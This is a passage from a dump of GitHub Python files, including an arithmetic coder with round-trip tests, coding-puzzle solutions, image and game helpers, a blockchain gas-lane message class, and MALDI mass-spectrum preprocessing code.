range(PRECISION):\n self._code<<=1\n try:\n next_bit=self._infile.get_bit()\n except EOFError:\n pass\n except:\n raise\n else:\n self._code|=next_bit\n self._lower=0\n self._upper=0xFFFF\n def get_unscaled_code(self):\n range=self._upper-self._lower+1\n unscaled=self._code-self._lower+1\n unscaled=unscaled*self._cumulative_prob-1\n unscaled/=range\n return unscaled\n def get_symbol_from_probability(self,probability):\n first=0\n last=self.upper(EOF_CHAR)\n middle=last/2\n while(last>=first):\n if probability=self._ranges[self.upper(middle)]:\n first=middle+1\n middle=first+((last-first)/2)\n else:\n return middle\n raise ValueError('Probability not in range.')\n def read_encoded_bits(self):\n mask_bit_zero=self.mask_bit(0)\n mask_bit_one=self.mask_bit(1)\n while True:\n if(self._upper^~self._lower)&mask_bit_zero:\n pass\n elif(~self._upper&self._lower)&mask_bit_one:\n self._lower&=~(mask_bit_zero|mask_bit_one)\n self._upper|=mask_bit_one\n self._code^=mask_bit_one\n else:\n return\n self._lower&=MSB_MASK\n self._lower<<=1\n self._upper&=MSB_MASK\n self._upper<<=1\n self._upper|=1\n self._code&=MSB_MASK\n self._code<<=1\n try:\n next_bit=self._infile.get_bit()\n except EOFError:\n pass\n except:\n raise\n else:\n self._code|=next_bit\nimport os\nimport filecmp\nimport tempfile\nimport unittest\nclass EncodeDirTest(unittest.TestCase):\n def setUp(self):\n self.dir=os.listdir('.')\n makesuffix=tempfile._RandomNameSequence()\n self.encoded=tempfile.gettempprefix()+next(makesuffix)\n self.decoded=tempfile.gettempprefix()+next(makesuffix)\n while self.encoded in self.dir:\n self.encoded=tempfile.gettempprefix()+next(makesuffix)\n while self.decoded in self.dir:\n self.decoded=tempfile.gettempprefix()+next(makesuffix)\n self.ar=ArithmeticCode()\n def tearDown(self):\n del self.ar\n if os.path.isfile(self.encoded):\n os.remove(self.encoded)\n if 
os.path.isfile(self.decoded):\n os.remove(self.decoded)\n def test_static(self):\n print('\\nTests Using Static Model:')\n for src in self.dir:\n if os.path.isfile(src):\n print('\\tEncoding',src)\n self.ar.__init__(True)\n self.ar.encode_file(src,self.encoded)\n print('\\tDecoding',src)\n self.ar.__init__(True)\n self.ar.decode_file(self.encoded,self.decoded)\n self.assertTrue(filecmp.cmp(src,self.decoded),'Failed to Verify {0}'.format(src))\n os.remove(self.encoded)\n os.remove(self.decoded)\n def test_adaptive(self):\n print('\\nTests Using Adaptive Model:')\n for src in self.dir:\n if os.path.isfile(src):\n print('\\tEncoding',src)\n self.ar.__init__(False)\n self.ar.encode_file(src,self.encoded)\n print('\\tDecoding',src)\n self.ar.__init__(False)\n self.ar.decode_file(self.encoded,self.decoded)\n self.assertTrue(filecmp.cmp(src,self.decoded),'Failed to Verify {0}'.format(src))\n os.remove(self.encoded)\n os.remove(self.decoded)\nif __name__==\"__main__\":\n unittest.main()\n","repo_name":"catb0t/projects-backup","sub_path":"py/arithcoding/arcode-0.1/arcode/arcode.py","file_name":"arcode.py","file_ext":"py","file_size_in_byte":9212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12891106128","text":"import bisect\n\n\nclass Solution:\n def maxScore(self, nums1: list[int], nums2: list[int], k: int) -> int:\n pairs = [(n1, n2) for n1, n2 in zip(nums1, nums2)]\n pairs.sort(key = lambda x: x[1], reverse=True)\n \n my_heap = []\n for i in range(k):\n bisect.insort(my_heap, pairs[i][0])\n \n heap_sum = sum(my_heap)\n max_score = heap_sum * pairs[k-1][1]\n for i in range(k, len(pairs)):\n curr_val = pairs[i][0]\n curr_min = pairs[i][1]\n bisect.insort(my_heap, curr_val)\n heap_sum += curr_val - my_heap.pop(0)\n max_score = max(max_score, heap_sum * curr_min)\n \n return max_score\n \n \nif __name__ == '__main__':\n sol = Solution()\n print('12 ===', sol.maxScore(nums1 = [1,3,3,2], nums2 = [2,1,3,4], k = 3))\n print('30 ===', sol.maxScore(nums1 = [4,2,3,1,1], nums2 = [7,5,10,9,6], k = 1))\n ","repo_name":"Vskesha/leetcode_solutions","sub_path":"leetcode_solutions/maximum_subsequence_score_2542.py","file_name":"maximum_subsequence_score_2542.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"34660746130","text":"import numpy as np\nimport open3d as o3d\nfrom skimage.color import rgb2hsv\n\nimport WoundSegLib.HelperFunctions as F\n\n\nclass PickedPointSet:\n \"\"\"\n Container to hold a set of user (or given) 'picked' points. These points typically picked from the UI typically\n only contain the vertex index. 
This class extends that to easily retrieve color and statistical information from\n those points\n \"\"\"\n\n # noinspection PyTypeChecker\n def __init__(pp, pickedPointIndexes: np.ndarray, mesh: o3d.geometry.TriangleMesh, self):\n\n pp.indexes: np.ndarray = pickedPointIndexes\n pp.coordinates: np.ndarray = np.asarray(mesh.vertices)[pickedPointIndexes]\n pp.RGB: np.ndarray = np.asarray(mesh.vertex_colors)[pickedPointIndexes]\n pp.pointCount: int = len(pickedPointIndexes)\n\n pp.__HSV_STORED: np.ndarray = None\n pp.__RGBHSV_STORED: np.ndarray = None\n pp.__coordinatesQuartiles_STORED: np.ndarray = None\n pp.__RGBQuartiles_STORED: np.ndarray = None\n pp.__HSVQuartiles_STORED: np.ndarray = None\n pp.self = self\n \n def __GetHSV(pp) -> np.ndarray:\n \"\"\"\n Returns HSV Array in order of point indexes\n\n Returns\n -------\n TYPE np.ndarray of dimensions [(number of verts) x 3].\n\n \"\"\"\n if pp.__HSV_STORED is None:\n pp.__HSV_STORED = (rgb2hsv(pp.RGB))\n return pp.__HSV_STORED\n \n def __GetRGBQuartiles(pp) -> np.ndarray:\n \"\"\"\n returns quartile 1, 2, 3 for each color channel\n\n Returns\n -------\n 2D array\n R_Q1, R_Q2, R_Q3\n G_Q1...\n\n \"\"\"\n if pp.__RGBQuartiles_STORED is None:\n R: np.ndarray = F.StatsGet123_Quartiles(pp.RGB[:, 0])\n G: np.ndarray = F.StatsGet123_Quartiles(pp.RGB[:, 1])\n B: np.ndarray = F.StatsGet123_Quartiles(pp.RGB[:, 2])\n pp.__RGBQuartiles_STORED = np.vstack((R, G, B))\n return pp.__RGBQuartiles_STORED\n\n def __GetRGBHSV(pp) -> np.ndarray:\n \"\"\"\n Returns 6 x N array of R, G, B, H, S, V channel data\n\n Returns\n -------\n 2D array\n R G B H S V\n ... number of vertices down ...\n \"\"\"\n if pp.__RGBHSV_STORED is None:\n pp.__RGBHSV_STORED = np.hstack([pp.RGB, pp.HSV])\n return pp.__RGBHSV_STORED\n\n def __GetHSVQuartiles(pp) -> np.ndarray:\n \"\"\"\n returns quartile 1, 2, 3 for each color channel\n\n Returns\n -------\n 2D array\n H_Q1, H_Q2, H_Q3\n S_Q1...\n\n \"\"\"\n if pp.__HSVQuartiles_STORED is None:\n H: np.ndarray = F.StatsGet123_Quartiles(pp.HSV[:, 0])\n S: np.ndarray = F.StatsGet123_Quartiles(pp.HSV[:, 1])\n V: np.ndarray = F.StatsGet123_Quartiles(pp.HSV[:, 2])\n pp.__HSVQuartiles_STORED = np.vstack((H, S, V))\n return pp.__HSVQuartiles_STORED\n \n def __GetRGBHSVQuartiles(pp) -> np.ndarray:\n \"\"\"\n returns Quartiles 1, 2, 3 for every color channel\n Returns\n -------\n 2D array\n R_Q1, R_Q2, R_Q3\n G_Q1...\n B_Q1...\n H_Q1...\n \"\"\"\n return np.vstack([pp.RGB_Quartiles, pp.HSV_Quartiles]) # since inputs are always small, no need to cache\n\n def __GetCoordQuartiles(pp) -> np.ndarray:\n \"\"\"\n returns quartile 1, 2, 3 for each XYZ channel in stored coordinate\n\n Returns\n -------\n 2D array\n X_Q1, X_Q2, X_Q3\n Y_Q1...\n\n \"\"\"\n if pp.__coordinatesQuartiles_STORED is None:\n X: np.ndarray = F.StatsGet123_Quartiles((pp.coordinates[:, 0]))\n Y: np.ndarray = F.StatsGet123_Quartiles((pp.coordinates[:, 1]))\n Z: np.ndarray = F.StatsGet123_Quartiles((pp.coordinates[:, 2]))\n\n pp.__coordinatesQuartiles_STORED = np.vstack((X, Y, Z))\n return pp.__coordinatesQuartiles_STORED\n\n def GetSpecificChannel(pp, channel: int or str) -> np.ndarray:\n \"\"\"\n Returns a specific color channel\n\n Parameters\n ----------\n channel : int or str\n The channel you want to retrieve\n\n Returns\n -------\n np.ndarrray\n 1D array of color channel data\n\n \"\"\"\n\n intIndex: int = F.IntOrStringToColorInt(channel)\n return pp.RGBHSV[:, intIndex]\n\n def GetSpecificChannelQuartiles(pp, channel: int or str) -> np.ndarray:\n \"\"\"\n Returns a specific 
color statistics np.ndarray by int index\n\n Parameters\n ----------\n channel : int\n 0-2 for RGB, 3-5 for HSV. Channel string name can be used instead as well\n\n Returns\n -------\n Color stats: np.ndarray\n Q1 Q2 Q3 stats for a channel.\n\n \"\"\"\n\n intIndex: int = F.IntOrStringToColorInt(channel)\n return pp.RGBHSV_Quartiles[intIndex, :]\n\n \n HSV = property(fget=__GetHSV)\n RGBHSV = property(fget=__GetRGBHSV)\n coordinate_Quartiles = property(fget=__GetCoordQuartiles)\n RGB_Quartiles = property(fget=__GetRGBQuartiles)\n HSV_Quartiles = property(fget=__GetHSVQuartiles)\n RGBHSV_Quartiles = property(fget=__GetRGBHSVQuartiles)\n","repo_name":"Amir-Rasteg/Segmentation-Library","sub_path":"WoundSegLib/PickedPointsSet.py","file_name":"PickedPointsSet.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"543841976","text":"import random\nimport cv2\nimport numpy as np\n\n\ndef get_image_path():\n import tkinter as tk\n from tkinter import filedialog\n # Create a root window\n root = tk.Tk()\n root.withdraw()\n # Create a file dialog box and get the selected file path\n file_path = filedialog.askopenfilename()\n # Print the selected file path\n print(\"Selected file path:\", file_path)\n return file_path\n\n\ndef get_image_bytes(path):\n with open(path, 'rb') as f:\n byte_im = f.read()\n return byte_im\n\n\ndef display_image(image_bytes, name):\n image_array = np.frombuffer(image_bytes, dtype=np.uint8)\n image = cv2.imdecode(image_array, cv2.IMREAD_COLOR)\n if image is None:\n # Create a random image\n height, width = 480, 640\n image = np.zeros((height, width, 3), dtype=np.uint8)\n image[:, :, :] = [random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)]\n # Display the random image\n cv2.imshow(name, image)\n else:\n # Display the decoded image\n cv2.imshow(name, image)\n # Wait for a key press and then close the window\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef write_to_dir(directory, image):\n with open(directory + '.jpg', 'wb') as f:\n f.write(image)\n\n\ndef image_list(path):\n images = [get_image_bytes(path+str(x)+'.jpg') for x in range(0, 100)]\n return images\n","repo_name":"moaz310/Blowfish_image","sub_path":"image_tools.py","file_name":"image_tools.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40289969246","text":"from board import *\nfrom userinterface import Player\nfrom models import NeuralNetwork\n\nclass Game():\n\n def __init__(self, player1, player2):\n self.board = Board()\n if isinstance(player1, NeuralNetwork) or isinstance(player1, Player):\n if isinstance(player2, NeuralNetwork) or isinstance(player2, Player):\n self.player1 = player1\n self.player2 = player2\n self.turn = True\n else:\n raise ValueError(\"Player2 is not a valid opponent type!\")\n else:\n raise ValueError(\"Player1 is not a valid opponent type!\")\n\n def generate_board_info(self):\n return self.board.matrix\n\n #Will prompt the next player to make a move, then return whether a win has occurred and the last player to make a move\n def next_turn(self):\n if self.turn: #Player1's turn\n move = self.player1.prompt_turn(generate_board_info())\n else: #Player2's turn\n move = self.player2.prompt_turn(generate_board_info())\n self.turn = not 
self.turn\n","repo_name":"TheTerrior/ConnectFourAI_DEAD","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12783097181","text":"N = int(input())\r\narr = [list(map(int, input().split())) for _ in range(N)]\r\nwhite, blue = 0, 0\r\n\r\ndef cutting(sr, sc, N):\r\n global white, blue\r\n # 들어온 구역의 모든 원소를 합해보기\r\n section_sum = sum(sum(arr[i][sc:sc+N]) for i in range(sr, sr+N))\r\n\r\n # 종료조건\r\n if not section_sum:\r\n white += 1\r\n return\r\n elif section_sum == N ** 2:\r\n blue += 1\r\n return\r\n\r\n # 더 쪼개야 할 때\r\n else:\r\n cutting(sr, sc, N//2)\r\n cutting(sr, sc+N//2, N//2)\r\n cutting(sr+N//2, sc, N//2)\r\n cutting(sr+N//2, sc+N//2, N//2)\r\n\r\n\r\ncutting(0, 0, N)\r\nprint(white)\r\nprint(blue)\r\n","repo_name":"baebaemin/Solved_Algorithm","sub_path":"백준/Silver/2630. 색종이 만들기/색종이 만들기.py","file_name":"색종이 만들기.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18555414853","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis is the message module\n\"\"\"\nimport numpy as np\nimport params \n\nenv_params = params.env_params()\nN_lanes = env_params['N_lanes']\n\nclass Message:\n def __init__(self, ID: str, gas_fee_cap: list, gas_premium: list, opcode_list: list, params: list = None):\n \"\"\"\n Represents a message included in the blockchain.\n\n Args:\n ID (str): The identifier for the message.\n gas_fee_cap (float): The maximum fee that the sender is willing to pay.\n gas_premium (float): The additional fee that the sender is willing to pay to get the transaction included\n in a block quickly.\n opcode_list (list): List of opcode instances representing the operations in the message.\n params (list, optional): Additional parameters for the message. 
Defaults to None.\n \"\"\"\n self.ID = ID\n self.gas_fee_cap = gas_fee_cap\n self.gas_premium = gas_premium\n self.opcode_list = opcode_list\n self.gas_used = self.get_gas_used()\n self.gas_limit = self.calculate_gas_limit()\n self.params = params\n\n def get_gas_used(self) -> list:\n \"\"\"\n Calculates the total gas used for each lane by summing up the gas used by each opcode in the opcode list.\n\n Returns:\n list: The gas used for each lane.\n \"\"\"\n gas_used = [ 0 for i in range(N_lanes)]\n for opcode in self.opcode_list:\n if len(gas_used)>1:\n lane = opcode.belongs_to_lane\n else:\n lane=0\n gas_used[lane] += opcode.gas_used\n\n return gas_used\n\n def calculate_gas_limit(self) ->list:\n \"\"\"\n Calculates the gas limit for each lane by adding a random factor to the gas used.\n\n Returns:\n list: The calculated gas limit for each lane.\n \"\"\"\n gas_limit = [ 0 for i in range(N_lanes)]\n\n for l in range(N_lanes):\n overestimation_factor=(1 + 0.2*np.random.random())\n gas_limit[l]=int(self.gas_used[l]*overestimation_factor)\n\n return gas_limit\n \nif __name__ == '__main__':\n from opcodes import Opcode\n\n opcode1 = Opcode(1, \"ADD\")\n opcode2 = Opcode(2, \"SUB\")\n opcode3 = Opcode(3, \"MUL\")\n opcode4 = Opcode(4, \"foreign_opcode\", 100)\n\n opcode_list = [opcode1, opcode2, opcode3, opcode4]\n MESSAGE_NAME = 'msg1'\n message1 = Message(MESSAGE_NAME, [100.0,100], [50.0,50], opcode_list)\n print(f'Message {MESSAGE_NAME} has a gas usage of {message1.gas_used} and a gas limit of {message1.gas_limit}')\n","repo_name":"juanpmcianci/IC3-Hackathon-gas-lanes","sub_path":"src/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72237840253","text":"from scipy.signal import savgol_filter\nfrom scipy import sparse\nfrom scipy.linalg import norm\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import binned_statistic\nfrom maldi_nn.utils import topf\nimport matplotlib.pyplot as plt\nimport h5torch\nimport torch\n\n\nclass SpectrumObject:\n \"\"\"Base Spectrum Object class\n\n Can be instantiated directly with 1-D np.arrays for mz and intensity.\n Alternatively, can be read from csv files or from bruker output data.\n Reading from Bruker data is based on the code in https://github.com/sgibb/readBrukerFlexData\n\n Parameters\n ----------\n mz : 1-D np.array, optional\n mz values, by default None\n intensity : 1-D np.array, optional\n intensity values, by default None\n \"\"\"\n\n def __init__(self, mz=None, intensity=None):\n self.mz = mz\n self.intensity = intensity\n if self.intensity is not None:\n if np.issubdtype(self.intensity.dtype, np.unsignedinteger):\n self.intensity = self.intensity.astype(int)\n if self.mz is not None:\n if np.issubdtype(self.mz.dtype, np.unsignedinteger):\n self.mz = self.mz.astype(int)\n\n def __getitem__(self, index):\n return SpectrumObject(mz=self.mz[index], intensity=self.intensity[index])\n\n def __len__(self):\n if self.mz is not None:\n return self.mz.shape[0]\n else:\n return 0\n\n def plot(self, as_peaks=False):\n \"\"\"Plot a spectrum via matplotlib\n\n Parameters\n ----------\n as_peaks : bool, optional\n draw points in the spectrum as individualpeaks, instead of connecting the points in the spectrum, by default False\n \"\"\"\n if as_peaks:\n mz_plot = np.stack([self.mz - 1, self.mz, self.mz + 1]).T.reshape(-1)\n int_plot = np.stack(\n [\n np.zeros_like(self.intensity),\n self.intensity,\n 
np.zeros_like(self.intensity),\n ]\n ).T.reshape(-1)\n else:\n mz_plot, int_plot = self.mz, self.intensity\n plt.plot(mz_plot, int_plot)\n\n def __repr__(self):\n string_ = np.array2string(\n np.stack([self.mz, self.intensity]), precision=5, threshold=10, edgeitems=2\n )\n mz_string, int_string = string_.split(\"\\n\")\n mz_string = mz_string[1:]\n int_string = int_string[1:-1]\n return \"SpectrumObject([\\n\\tmz = %s,\\n\\tint = %s\\n])\" % (mz_string, int_string)\n\n @staticmethod\n def tof2mass(ML1, ML2, ML3, TOF):\n A = ML3\n B = np.sqrt(1e12 / ML1)\n C = ML2 - TOF\n\n if A == 0:\n return (C * C) / (B * B)\n else:\n return ((-B + np.sqrt((B * B) - (4 * A * C))) / (2 * A)) ** 2\n\n @classmethod\n def from_bruker(cls, acqu_file, fid_file):\n \"\"\"Read a spectrum from Bruker's format\n\n Parameters\n ----------\n acqu_file : str\n \"acqu\" file bruker folder\n fid_file : str\n \"fid\" file in bruker folder\n\n Returns\n -------\n SpectrumObject\n \"\"\"\n with open(acqu_file, \"rb\") as f:\n lines = [line.decode(\"utf-8\", errors=\"replace\").rstrip() for line in f]\n for l in lines:\n if l.startswith(\"##$TD\"):\n TD = int(l.split(\"= \")[1])\n if l.startswith(\"##$DELAY\"):\n DELAY = int(l.split(\"= \")[1])\n if l.startswith(\"##$DW\"):\n DW = float(l.split(\"= \")[1])\n if l.startswith(\"##$ML1\"):\n ML1 = float(l.split(\"= \")[1])\n if l.startswith(\"##$ML2\"):\n ML2 = float(l.split(\"= \")[1])\n if l.startswith(\"##$ML3\"):\n ML3 = float(l.split(\"= \")[1])\n if l.startswith(\"##$BYTORDA\"):\n BYTORDA = int(l.split(\"= \")[1])\n if l.startswith(\"##$NTBCal\"):\n NTBCal = l.split(\"= \")[1]\n\n intensity = np.fromfile(fid_file, dtype={0: \"i\"}[BYTORDA])\n\n if len(intensity) < TD:\n TD = len(intensity)\n TOF = DELAY + np.arange(TD) * DW\n\n mass = cls.tof2mass(ML1, ML2, ML3, TOF)\n\n intensity[intensity < 0] = 0\n\n return cls(mz=mass, intensity=intensity)\n\n @classmethod\n def from_tsv(cls, file, sep=\" \"):\n \"\"\"Read a spectrum from txt\n\n Parameters\n ----------\n file : str\n path to csv file\n sep : str, optional\n separator in the file, by default \" \"\n\n Returns\n -------\n SpectrumObject\n \"\"\"\n s = pd.read_table(\n file, sep=sep, index_col=None, comment=\"#\", header=None\n ).values\n mz = s[:, 0]\n intensity = s[:, 1]\n return cls(mz=mz, intensity=intensity)\n\n def torch(self):\n \"\"\"Converts spectrum to dict of tensors\"\"\"\n return {\"mz\": torch.tensor(self.mz), \"intensity\": torch.tensor(self.intensity)}\n\n\nclass Binner:\n \"\"\"Pre-processing function for binning spectra in equal-width bins.\n\n Parameters\n ----------\n start : int, optional\n start of the binning range, by default 2000\n stop : int, optional\n end of the binning range, by default 20000\n step : int, optional\n width of every bin, by default 3\n aggregation : str, optional\n how to aggregate intensity values in each bin.\n Is passed to the statistic argument of https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.binned_statistic.html\n Can take any argument that the statistic argument also takes, by default \"sum\"\n \"\"\"\n\n def __init__(self, start=2000, stop=20000, step=3, aggregation=\"sum\"):\n self.bins = np.arange(start, stop + 1e-8, step)\n self.mz_bins = self.bins[:-1] + step / 2\n self.agg = aggregation\n\n def __call__(self, SpectrumObj):\n if self.agg == \"sum\":\n bins, _ = np.histogram(\n SpectrumObj.mz, self.bins, weights=SpectrumObj.intensity\n )\n else:\n bins = binned_statistic(\n SpectrumObj.mz,\n SpectrumObj.intensity,\n bins=self.bins,\n 
statistic=self.agg,\n ).statistic\n bins = np.nan_to_num(bins)\n\n s = SpectrumObject(intensity=bins, mz=self.mz_bins)\n return s\n\n\nclass Normalizer:\n \"\"\"Pre-processing function for normalizing the intensity of a spectrum.\n Commonly referred to as total ion current (TIC) calibration.\n\n Parameters\n ----------\n sum : int, optional\n Make the total intensity of the spectrum equal to this amount, by default 1\n \"\"\"\n\n def __init__(self, sum=1):\n self.sum = sum\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject()\n\n s = SpectrumObject(\n intensity=SpectrumObj.intensity / SpectrumObj.intensity.sum() * self.sum,\n mz=SpectrumObj.mz,\n )\n return s\n\n\nclass Trimmer:\n \"\"\"Pre-processing function for trimming ends of a spectrum.\n This can be used to remove inaccurate measurements.\n\n Parameters\n ----------\n min : int, optional\n remove all measurements with mz's lower than this value, by default 2000\n max : int, optional\n remove all measurements with mz's higher than this value, by default 20000\n \"\"\"\n\n def __init__(self, min=2000, max=20000):\n self.range = [min, max]\n\n def __call__(self, SpectrumObj):\n indices = (self.range[0] < SpectrumObj.mz) & (SpectrumObj.mz < self.range[1])\n\n s = SpectrumObject(\n intensity=SpectrumObj.intensity[indices], mz=SpectrumObj.mz[indices]\n )\n return s\n\n\nclass VarStabilizer:\n \"\"\"Pre-processing function for manipulating intensities.\n Commonly performed to stabilize their variance.\n\n Parameters\n ----------\n method : str, optional\n function to apply to intensities.\n can be either \"sqrt\", \"log\", \"log2\" or \"log10\", by default \"sqrt\"\n \"\"\"\n\n def __init__(self, method=\"sqrt\"):\n methods = {\"sqrt\": np.sqrt, \"log\": np.log, \"log2\": np.log2, \"log10\": np.log10}\n self.fun = methods[method]\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject(intensity=self.fun(SpectrumObj.intensity), mz=SpectrumObj.mz)\n return s\n\n\nclass BaselineCorrecter:\n \"\"\"Pre-processing function for baseline correction (also referred to as background removal).\n\n Support SNIP, ALS and ArPLS.\n Some of the code is based on https://stackoverflow.com/questions/29156532/python-baseline-correction-library.\n\n Parameters\n ----------\n method : str, optional\n Which method to use\n either \"SNIP\", \"ArPLS\" or \"ALS\", by default None\n als_lam : float, optional\n lambda value for ALS and ArPLS, by default 1e8\n als_p : float, optional\n p value for ALS and ArPLS, by default 0.01\n als_max_iter : int, optional\n max iterations for ALS and ArPLS, by default 10\n als_tol : float, optional\n stopping tolerance for ALS and ArPLS, by default 1e-6\n snip_n_iter : int, optional\n iterations of SNIP, by default 10\n \"\"\"\n\n def __init__(\n self,\n method=None,\n als_lam=1e8,\n als_p=0.01,\n als_max_iter=10,\n als_tol=1e-6,\n snip_n_iter=10,\n ):\n self.method = method\n self.lam = als_lam\n self.p = als_p\n self.max_iter = als_max_iter\n self.tol = als_tol\n self.n_iter = snip_n_iter\n\n def __call__(self, SpectrumObj):\n if \"LS\" in self.method:\n baseline = self.als(\n SpectrumObj.intensity,\n method=self.method,\n lam=self.lam,\n p=self.p,\n max_iter=self.max_iter,\n tol=self.tol,\n )\n elif self.method == \"SNIP\":\n baseline = self.snip(SpectrumObj.intensity, self.n_iter)\n\n s = SpectrumObject(\n intensity=SpectrumObj.intensity - baseline, mz=SpectrumObj.mz\n )\n return s\n\n def als(self, y, method=\"ArPLS\", lam=1e8, p=0.01, max_iter=10, tol=1e-6):\n L = len(y)\n D = sparse.diags([1, -2, 1], [0, -1, -2], 
shape=(L, L - 2))\n D = lam * D.dot(\n D.transpose()\n ) # Precompute this term since it does not depend on `w`\n\n w = np.ones(L)\n W = sparse.spdiags(w, 0, L, L)\n\n crit = 1\n count = 0\n while crit > tol:\n z = sparse.linalg.spsolve(W + D, w * y)\n\n if method == \"AsLS\":\n w_new = p * (y > z) + (1 - p) * (y < z)\n elif method == \"ArPLS\":\n d = y - z\n dn = d[d < 0]\n m = np.mean(dn)\n s = np.std(dn)\n w_new = 1 / (1 + np.exp(np.minimum(2 * (d - (2 * s - m)) / s, 70)))\n\n crit = norm(w_new - w) / norm(w)\n w = w_new\n W.setdiag(w)\n count += 1\n if count > max_iter:\n break\n return z\n\n def snip(self, y, n_iter):\n y_prepr = np.log(np.log(np.sqrt(y + 1) + 1) + 1)\n for i in range(1, n_iter + 1):\n rolled = np.pad(y_prepr, (i, i), mode=\"edge\")\n new = np.minimum(\n y_prepr, (np.roll(rolled, i) + np.roll(rolled, -i))[i:-i] / 2\n )\n y_prepr = new\n return (np.exp(np.exp(y_prepr) - 1) - 1) ** 2 - 1\n\n\nclass Smoother:\n \"\"\"Pre-processing function for smoothing. Uses Savitzky-Golay filter.\n\n Parameters\n ----------\n halfwindow : int, optional\n halfwindow of savgol_filter, by default 10\n polyorder : int, optional\n polyorder of savgol_filter, by default 3\n \"\"\"\n\n def __init__(self, halfwindow=10, polyorder=3):\n self.window = halfwindow * 2 + 1\n self.poly = polyorder\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject(\n intensity=np.maximum(\n savgol_filter(SpectrumObj.intensity, self.window, self.poly), 0\n ),\n mz=SpectrumObj.mz,\n )\n return s\n\n\nclass PersistenceTransformer:\n \"\"\"Pre-processing function for Peak Detection.\n Uses the Persistance Transformation first outlined in https://doi.org/10.1093/bioinformatics/btaa429\n Underlying code is from https://github.com/BorgwardtLab/Topf\n\n Parameters\n ----------\n extract_nonzero : bool, optional\n whether to extract detected peaks or to keep zeros in, by default False\n \"\"\"\n\n def __init__(self, extract_nonzero=False):\n self.filter = extract_nonzero\n\n def __call__(self, SpectrumObj):\n a = np.stack([SpectrumObj.mz, SpectrumObj.intensity]).T\n b = topf.PersistenceTransformer().fit_transform(a)\n\n s = SpectrumObject()\n if self.filter:\n peaks = b[:, 1] != 0\n s = SpectrumObject(intensity=b[peaks, 1], mz=b[peaks, 0])\n else:\n s = SpectrumObject(intensity=b[:, 1], mz=b[:, 0])\n return s\n\n\nclass PeakFilter:\n \"\"\"Pre-processing function for filtering peaks.\n\n Filters in two ways: absolute number of peaks and height.\n\n Parameters\n ----------\n max_number : int, optional\n Maximum number of peaks to keep. 
Prioritizes peaks to keep by height.\n by default None, for no filtering\n min_intensity : float, optional\n Min intensity of peaks to keep, by default None, for no filtering\n \"\"\"\n\n def __init__(self, max_number=None, min_intensity=None):\n self.max_number = max_number\n self.min_intensity = min_intensity\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject(intensity=SpectrumObj.intensity, mz=SpectrumObj.mz)\n\n if self.max_number is not None:\n indices = np.argsort(-s.intensity, kind=\"stable\")\n take = np.sort(indices[: self.max_number])\n\n s.mz = s.mz[take]\n s.intensity = s.intensity[take]\n\n if self.min_intensity is not None:\n take = s.intensity >= self.min_intensity\n\n s.mz = s.mz[take]\n s.intensity = s.intensity[take]\n\n return s\n\n\nclass RandomPeakShifter:\n \"\"\"Pre-processing function for adding random (gaussian) noise to the mz values of peaks.\n\n Parameters\n ----------\n std : float, optional\n stdev of the random noise to add, by default 1\n \"\"\"\n\n def __init__(self, std=1.0):\n self.std = std\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject(\n intensity=SpectrumObj.intensity,\n mz=SpectrumObj.mz\n + np.random.normal(scale=self.std, size=SpectrumObj.mz.shape),\n )\n return s\n\n\nclass UniformPeakShifter:\n \"\"\"Pre-processing function for adding uniform noise to the mz values of peaks.\n\n Parameters\n ----------\n range : float, optional\n let each peak shift by maximum this value, by default 1.5\n \"\"\"\n\n def __init__(self, range=1.5):\n self.range = range\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject(\n intensity=SpectrumObj.intensity,\n mz=SpectrumObj.mz\n + np.random.uniform(\n low=-self.range, high=self.range, size=SpectrumObj.mz.shape\n ),\n )\n return s\n\n\nclass Binarizer:\n \"\"\"Pre-processing function for binarizing intensity values of peaks.\n\n Parameters\n ----------\n threshold : float\n Threshold for the intensities to become 1 or 0.\n \"\"\"\n\n def __init__(self, threshold):\n self.threshold = threshold\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject(\n intensity=(SpectrumObj.intensity > self.threshold).astype(\n SpectrumObj.intensity.dtype\n ),\n mz=SpectrumObj.mz,\n )\n return s\n\n\nclass SequentialPreprocessor:\n \"\"\"Chain multiple preprocessors so that a pre-processing pipeline can be called with one line.\n\n Example:\n ```python\n preprocessor = SequentialPreprocessor(\n VarStabilizer(),\n Smoother(),\n BaselineCorrecter(method=\"SNIP\"),\n Normalizer(),\n Binner()\n )\n preprocessed_spectrum = preprocessor(spectrum)\n ```\n \"\"\"\n\n def __init__(self, *args):\n self.preprocessors = args\n\n def __call__(self, SpectrumObj):\n for step in self.preprocessors:\n SpectrumObj = step(SpectrumObj)\n return SpectrumObj\n","repo_name":"gdewael/maldi-nn","sub_path":"maldi_nn/spectrum.py","file_name":"spectrum.py","file_ext":"py","file_size_in_byte":16427,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"19416572684","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n\"\"\"\nPython implementation of BlastLine, an alternative Cython implementation is\navailable in 